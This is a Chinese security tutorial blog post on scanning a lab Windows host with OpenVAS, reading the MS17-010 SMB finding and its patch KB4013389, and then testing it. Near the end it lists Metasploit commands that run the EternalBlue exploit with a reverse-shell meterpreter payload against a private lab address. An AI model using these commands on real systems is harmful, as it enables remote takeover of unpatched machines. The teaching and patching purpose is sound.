#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复

网友投稿 250 2022-10-04


#yyds干货盘点#web安全day46:使用Openvas+MSF理解漏扫方法、利用及补丁修复

使用OpenVAS进行漏扫

关于OpenVAS的下载和安装请移步​​web安全day40:最新版OpenVAS的安装配置 ​​

新建扫描目标

配置扫描策略

查看扫描模板,就是在扫描过程中使用的扫描策略和配置,这个扫描模板一般保持默认,也可以自己配置。

创建好的目标如下:

创建扫描任务

创建好目标后,需要创建扫描任务。

填写好相关信息,名称自定义。扫描目标要选择之前我们配置过的,会以下拉列表的形式展现。

创建好的扫描目标如下:

开始扫描

状态变成了requested--完成状态。

扫描完成

扫描结束后,显示已经完成。

扫描报告导出

下载好的报告如下。

对于漏*洞,我们主要关注以下内容

漏*洞名称:微软Windows SMB服务器多个漏*洞 - 远程 (4013389)

漏*洞风险等级:高危(HIGH)--中危(MEDIUM)--低危(LOW)--信息泄露

优先级

描述

修复建议

该评级是针对未经身份验证的远程攻*击者可以轻松利用并导致系统受损(任意代码执行)而无需用户交互的漏*洞。此类漏*洞通常为蠕虫、勒索软件等利用的漏*洞。

该漏*洞需尽快修复。

该评级适用于潜在可能危及资源的机密性、完整性或可用性的缺陷。此类漏*洞通常为暂无法真实可利用,但官方或互联网上披露的评级较高漏*洞,建议持续关注。

该漏*洞可延后修复。

该评级适用于能被成功利用可能性极低或者成功利用后无实际风险的漏*洞。此类漏*洞通常是程序源代码中的BUG缺陷,以及对合规场景和业务性能有影响的漏*洞。

该漏*洞暂可不修复。

漏*洞描述:‎Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block(SMB)Server是其中的一个为计算机提供身份验证用以访问服务器上打印机和文件系统的组件。 Microsoft Windows中的SMBv1服务器存在远程代码执行漏*洞。

漏*洞危害:远程攻*击者可借助特制的数据包利用该漏*洞执行任意代码。以下版本受到影响:Microsoft Windows Vista SP2,Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1,Windows Server 2012 Gold和R2,Windows RT 8.1,Windows 10 Gold,1511和1607,Windows Server 2016。

修复建议

修复

通过​​信息安全漏*洞门户  ​​可以获得cve和cnnvd的对应关系。​

在​​国家信息安全库​​中可以进一步查看并且获得补丁信息。

这里Microsoft知识库文章4013389所对应的补丁就是KB4013389.

实验一:以445端口为例理解MS17_010

我们通过OpenVAS扫描得出我们的目标主机开启了445端口,445端口是用于微软的文件共享SMB服务。我们知道,永恒之蓝可以根据445端口得到系统最高权限。

我们进行测试。

使用MSF针对445进行测试

关于MSF+MS17_010的测试方法可移步​​渗*透测试:metasploit+ms-17-010+Windows2008r2​​

msfconsole

msf6 > search ms17-010

use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/reverse_tcpset RHOSTS 192.168.189.153set LHOST 192.168.189.141exploit

getuid

shel


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:使用Jackson实现Map与Bean互转方式
下一篇:计算机病毒传播途径有哪些?如何做好病毒防护?(计算机病毒传播途径有哪些?如何做好病毒防护处理)
相关文章

 发表评论

暂时没有评论,来抢沙发吧~